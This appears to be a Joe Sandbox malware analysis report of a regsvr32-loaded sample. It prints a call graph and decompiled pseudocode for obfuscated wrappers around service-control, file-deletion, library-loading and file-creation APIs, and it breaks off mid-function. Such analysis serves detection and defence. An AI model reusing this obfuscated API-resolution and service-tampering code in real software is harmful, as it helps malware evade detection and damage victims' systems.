4825->4826 4826->4014 4838 1f86ee 4827->4838 4831 1f7bbf 4830->4831 4861 1ebd6b 4831->4861 4834 1f7d95 4834->4023 4837 1f02d8 2 API calls 4837->4834 4842 1f871a 4838->4842 4841 1f8946 4843 1f02d8 2 API calls 4841->4843 4842->4841 4844 1ecaf4 4842->4844 4847 1e823e 4842->4847 4851 1ebe5e 4842->4851 4854 1ffc9e 4842->4854 4858 1e26a7 4842->4858 4843->4844 4844->4023 4848 1e8254 4847->4848 4849 1e7f78 GetPEB 4848->4849 4850 1e82c4 4849->4850 4850->4842 4852 1e7f78 GetPEB 4851->4852 4853 1ebed7 4852->4853 4853->4842 4855 1ffcb7 4854->4855 4856 1e7f78 GetPEB 4855->4856 4857 1ffd34 4856->4857 4857->4842 4859 1f1919 GetPEB 4858->4859 4860 1e26f5 4859->4860 4860->4842 4862 1e7f78 GetPEB 4861->4862 4863 1ebdda 4862->4863 4863->4834 4864 1ff73b 4863->4864 4865 1ff75d 4864->4865 4866 1e7f78 GetPEB 4865->4866 4867 1f7d83 4866->4867 4867->4837 4875 1fe8c1 4868->4875 4869 1fea86 4871 1f17d2 GetPEB 4869->4871 4870 1e303a 2 API calls 4870->4875 4872 1fea97 4871->4872 4872->4043 4874 1ff5d9 2 API calls 4874->4875 4875->4869 4875->4870 4875->4872 4875->4874 4876 20224c GetPEB 4875->4876 4877 1ff94b GetPEB 4875->4877 4886 1f8ef8 4875->4886 4876->4875 4877->4875 4879 1f8d5c 4878->4879 4880 1f8d46 4878->4880 4879->4043 4880->4879 4881 1f17d2 GetPEB 4880->4881 4881->4880 4883 1ebe04 4882->4883 4890 1e7d03 4883->4890 4887 1f8f15 4886->4887 4888 1e303a 2 API calls 4887->4888 4889 1f9000 4888->4889 4889->4875 4892 1e7d1b 4890->4892 4894 1e7e67 4892->4894 4897 1e7e65 4892->4897 4898 1e303a 2 API calls 4892->4898 4899 1f0503 4892->4899 4915 1f8d61 4892->4915 4920 1e2710 4892->4920 4896 1f17d2 GetPEB 4894->4896 4896->4897 4897->4043 4898->4892 4902 1f12cb 4899->4902 4901 1f2519 GetPEB 4901->4902 4902->4901 4907 1ff5d9 GetPEB RtlAllocateHeap 4902->4907 4908 1f17c5 4902->4908 4909 1fa379 GetPEB 4902->4909 4911 1ffd42 GetPEB 4902->4911 4913 1ed2c9 GetPEB 4902->4913 4914 1ff94b GetPEB 4902->4914 4929 1e866c 4902->4929 4933 1f64cf 4902->4933 4937 1eed0a 4902->4937 4951 1ec98b 4902->4951 4955 
1f970d 4902->4955 4959 1ea838 4902->4959 4963 1ec01c 4902->4963 4907->4902 4908->4892 4909->4902 4911->4902 4913->4902 4914->4902 4916 1f64cf GetPEB 4915->4916 4917 1f8e04 4916->4917 4918 1f17d2 GetPEB 4917->4918 4919 1f8e16 4918->4919 4919->4892 4925 1e2d16 4920->4925 4921 1e2edc 4923 1f2519 GetPEB 4921->4923 4922 1e2eda 4922->4892 4923->4922 4924 1ff5d9 GetPEB RtlAllocateHeap 4924->4925 4925->4921 4925->4922 4925->4924 4926 1e866c GetPEB 4925->4926 4927 1ed2c9 GetPEB 4925->4927 4928 1ff94b GetPEB 4925->4928 4926->4925 4927->4925 4928->4925 4930 1e86a1 4929->4930 4931 1e7f78 GetPEB 4930->4931 4932 1e8728 4931->4932 4932->4902 4934 1f64e2 4933->4934 4935 1e7f78 GetPEB 4934->4935 4936 1f6555 4935->4936 4936->4902 4946 1efc94 4937->4946 4938 1f014c 4940 1f2519 GetPEB 4938->4940 4939 1f014a 4939->4902 4940->4939 4942 1e303a 2 API calls 4942->4946 4943 1f17d2 GetPEB 4943->4946 4944 1eeb4b GetPEB 4944->4946 4945 1ff5d9 GetPEB RtlAllocateHeap 4945->4946 4946->4938 4946->4939 4946->4942 4946->4943 4946->4944 4946->4945 4947 1f0184 GetPEB 4946->4947 4948 1ed2c9 GetPEB 4946->4948 4950 1ff94b GetPEB 4946->4950 4967 1e7a69 4946->4967 4971 1fa42c 4946->4971 4947->4946 4948->4946 4950->4946 4952 1ec9a7 4951->4952 4953 1e7f78 GetPEB 4952->4953 4954 1eca27 4953->4954 4954->4902 4956 1f972f 4955->4956 4957 1e7f78 GetPEB 4956->4957 4958 1f979e 4957->4958 4958->4902 4960 1ea865 4959->4960 4961 1e7f78 GetPEB 4960->4961 4962 1ea8e7 4961->4962 4962->4902 4964 1ec035 4963->4964 4965 1e7f78 GetPEB 4964->4965 4966 1ec0ac 4965->4966 4966->4902 4968 1e7a97 4967->4968 4969 1e7f78 GetPEB 4968->4969 4970 1e7b06 4969->4970 4970->4946 4972 1fa461 4971->4972 4973 1e7f78 GetPEB 4972->4973 4974 1fa4e8 4973->4974 4974->4946 4976 201a26 4975->4976 4977 1f25cd GetPEB 4976->4977 4978 201b7b 4976->4978 4981 201b98 4976->4981 4999 1e94d4 4976->4999 4977->4976 4995 1e33b6 4978->4995 4981->4051 4987 1ec83c 4982->4987 4983 1ff5d9 2 API calls 4983->4987 4984 1ec967 4986 1f3cbe GetPEB 4984->4986 4985 1e3e99 
GetPEB 4985->4987 4988 1ec965 4986->4988 4987->4983 4987->4984 4987->4985 4987->4988 4989 1ff94b GetPEB 4987->4989 5003 1e6c71 4987->5003 4988->4051 4989->4987 4992 1e35ca 4991->4992 4993 1e7f78 GetPEB 4992->4993 4994 1e3643 4993->4994 4994->4059 4996 1e33d4 4995->4996 4997 1e7f78 GetPEB 4996->4997 4998 1e3453 4997->4998 4998->4981 5000 1e94f1 4999->5000 5001 1e7f78 GetPEB 5000->5001 5002 1e957c 5001->5002 5002->4976 5004 1e6c8e 5003->5004 5005 1e7f78 GetPEB 5004->5005 5006 1e6d06 5005->5006 5006->4987 5007 1f6998 5008 1e2263 GetPEB 5007->5008 5009 1f6c12 5008->5009 5020 1ebee4 5009->5020 5012 1ff5d9 2 API calls 5013 1f6c49 5012->5013 5014 1f8eb3 GetPEB 5013->5014 5015 1f6c70 5014->5015 5016 1ff94b GetPEB 5015->5016 5017 1f6c83 5016->5017 5018 1e7bc6 2 API calls 5017->5018 5019 1f6c95 5018->5019 5021 1ebefd 5020->5021 5022 1e7f78 GetPEB 5021->5022 5023 1ebf7c 5022->5023 5023->5012 5023->5019 5024 1ff7f4 5025 1ff8f9 5024->5025 5026 1ee4f5 2 API calls 5025->5026 5031 1ff93e 5025->5031 5027 1ff90e 5026->5027 5032 1e9343 5027->5032 5030 1ff94b GetPEB 5030->5031 5033 1e935e 5032->5033 5035 1e94a2 5033->5035 5036 1f9635 5033->5036 5035->5030 5037 1f964e 5036->5037 5038 1e7f78 GetPEB 5037->5038 5039 1f96c5 5038->5039 5039->5033 5040 1e4313 5046 1e484a 5040->5046 5042 1e303a 2 API calls 5042->5046 5043 1f17d2 GetPEB 5043->5046 5044 1e4a79 5045 1f02d8 2 API calls 5044->5045 5048 1e4a77 5045->5048 5046->5042 5046->5043 5046->5044 5047 200575 GetPEB 5046->5047 5046->5048 5050 1ebee4 GetPEB 5046->5050 5051 1fa50a 2 API calls 5046->5051 5052 1e2263 GetPEB 5046->5052 5053 1feb61 5046->5053 5057 1f487b 5046->5057 5047->5046 5050->5046 5051->5046 5052->5046 5054 1feb8f 5053->5054 5055 1e7f78 GetPEB 5054->5055 5056 1fec19 5055->5056 5056->5046 5058 1f488b 5057->5058 5059 1e7f78 GetPEB 5058->5059 5060 1f4902 5059->5060 5060->5046

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 1e6e01-1e6eb3 call 1ec98a call 1e7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001E6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E001EC98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E001E7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001E6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 1b4459b95d6703c1b4caa44625aa43f6961021ab71a9828ffaaeffa4704f9e5d
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: 2F1146B2D01218BBDB04DFA6C8498DEBFB6EB45314F108189E518A6241D7B55B259B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 1e8e38-1e8ee4 call 1ec98a call 1e7f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E001E8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001EC98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E001E7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001E8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: bcb6cd587c426ca5ef08a7bade9ac400f23fd2331a6a381af0916262dd389e04
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 59112272E01208FBEF05DFA4DA4A8DEBFB6EB15314F10C089E914A6250E7B55B219F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 1e7bc6-1e7c79 call 1ec98a call 1e7f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001E7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E001EC98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E001E7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 001E7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 785961576bb061d842a0ca61fda983580ac6fa095c7a6c95bc3424cd723b09f8
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 91116DB1D0024CFFDB08DFE5D94AA9EBBB1EB50304F208198E414B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 1fed7b-1fee13 call 1ec98a call 1e7f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001FED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001EC98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E001E7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.SECHOST(?,?,?,?,?,?,?,?,?), ref: 001FEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 606a5a80d9e9b7083fa604d88505668408ea6b0d1192a84235344e453d393d3f
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: E2013972D00608BBDB08DFA5C94A8DEBFB5EF55314F10C08AE914A6241E7B25B558F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001E4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001EC98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: a7aaf4623a56de2f1acc39edacb6cac062db4fc5c335f3ff9a6b4702b678dc80
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 78114871C11208FFDB08DFA5DA469DEBBB4EB10315F20C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001F7B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E001E7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 001F7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: e017574e20abd4b42501e5639700262037a9d035103d9ae164503cc114cd30c0
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 4CF08C71E0030CFBDB44DBE6D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E001FA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E001EC98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E001E7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 001FA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 99e081d5ffaef02d30b1974f332de4fd57b053bab31117f97c95c38aa568aa66
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 5021E372901108FBDF05CFE9CD4A8DEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E001E816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
